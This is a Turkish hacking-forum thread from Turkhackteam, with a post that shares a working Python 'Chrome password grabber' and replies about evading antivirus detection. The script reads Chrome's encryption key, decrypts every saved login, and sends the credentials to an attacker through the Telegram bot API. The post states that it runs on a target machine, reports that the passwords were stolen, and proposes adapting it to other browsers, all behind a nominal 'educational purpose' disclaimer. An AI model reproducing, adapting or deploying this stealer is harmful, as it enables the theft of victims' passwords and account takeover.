hocam ama illaki güvenlik duvarına falan takınır maalesf şu fud olayı şart
Evet, her ne kadar kod olarak takılmasa da exe ye çevirmek için kullandığımız pyinstaller yüzünden illaki takılacak. Yani sen istersen kodunda sadece print hello yazdır ve pyinstaller ile exe ye çevir o zaman da takılacak. O yüzden genellikle bu işler için C ailesinde ki diller tercih ediliyor.hocam ama illaki güvenlik duvarına falan takınır maalesf şu fud olayı şart
Eline sağlık
Herkese merhaba, bugün sizlere python ile yazılmış olan chrome şifre grabberi paylaşacağım. Bu kod hedef bilgisayarda çalıştırıldığında hedefin chrome daki tüm kayıtlı şifrelerini telegram yoluyla hackera iletmeyi sağlar.
Daha önceki konularıma şuradan ulaşabilirsiniz: Python ile Hedefi Deli Etmek!Chrome Şifre Grabber:
Python ile RansomWare
NOT: ŞİFRELEME İŞLERİNDEN PEK ANLAMADIĞIM İÇİN KODUN YARISINI BAŞKA YERDEN ALDIM.
EĞİTİM AMAÇLIDIR SORUMLULUK KABUL ETMİYORUM
Python:import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil import requests def encryption_key(): local_state_yolu = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_state_yolu, "r", encoding="utf-8") as f: local_state = f.read() local_state = json.loads(local_state) key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) key = key[5:] return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_password(password, key): try: iv = password[3:15] password = password[15:] cipher = AES.new(key, AES.MODE_GCM, iv) return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return "" def send_telegram_document(bot_token, chat_id, document_path): url = f"https://api.telegram.org/bot{bot_token}/sendDocument" files = {'document': open(document_path, 'rb')} params = { "chat_id": chat_id, } try: response = requests.post(url, params=params, files=files) except: pass def main(): key = encryption_key() db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "default", "Login Data") filename = "ChromeData.db" shutil.copyfile(db_path, filename) db = sqlite3.connect(filename) cursor = db.cursor() cursor.execute( "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") credentials = [] for row in cursor.fetchall(): origin_url = row[0] action_url = row[1] username = row[2] password = decrypt_password(row[3], key) date_created = row[4] date_last_used = row[5] if username or password: credentials.append({ "Origin URL": origin_url, "Action URL": action_url, "Username": username, "Password": password }) cursor.close() db.close() try: os.remove(filename) except: pass if credentials: bot_token = "BOT TOKENİNİZ" chat_id = "CHAT ID NİZ" document_path = "credentials.txt" with open(document_path, "w") as file: json.dump(credentials, file, indent=4) send_telegram_document(bot_token, chat_id, document_path) os.remove(document_path) if __name__ == "__main__": main()
Kodumuz bu kadardı, şimdi bakalım telegram adresimize istediğimiz bilgiler düşmüş mü?
![]()
![]()
ve gördüğünüz gibi hedef makinedeki kayıtlı tüm chrome şifrelerini çaldık. Kodu aynı şekilde başka tarayıcılar içinde uygun hale getirebilirsiniz. Konuyu kısa tutmak adına kodu açıklamıyacağım, fakat isteyen varsa dm den veya burdan yazarsa açıklarım.
Okuduğunuz için teşekkürler ...
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.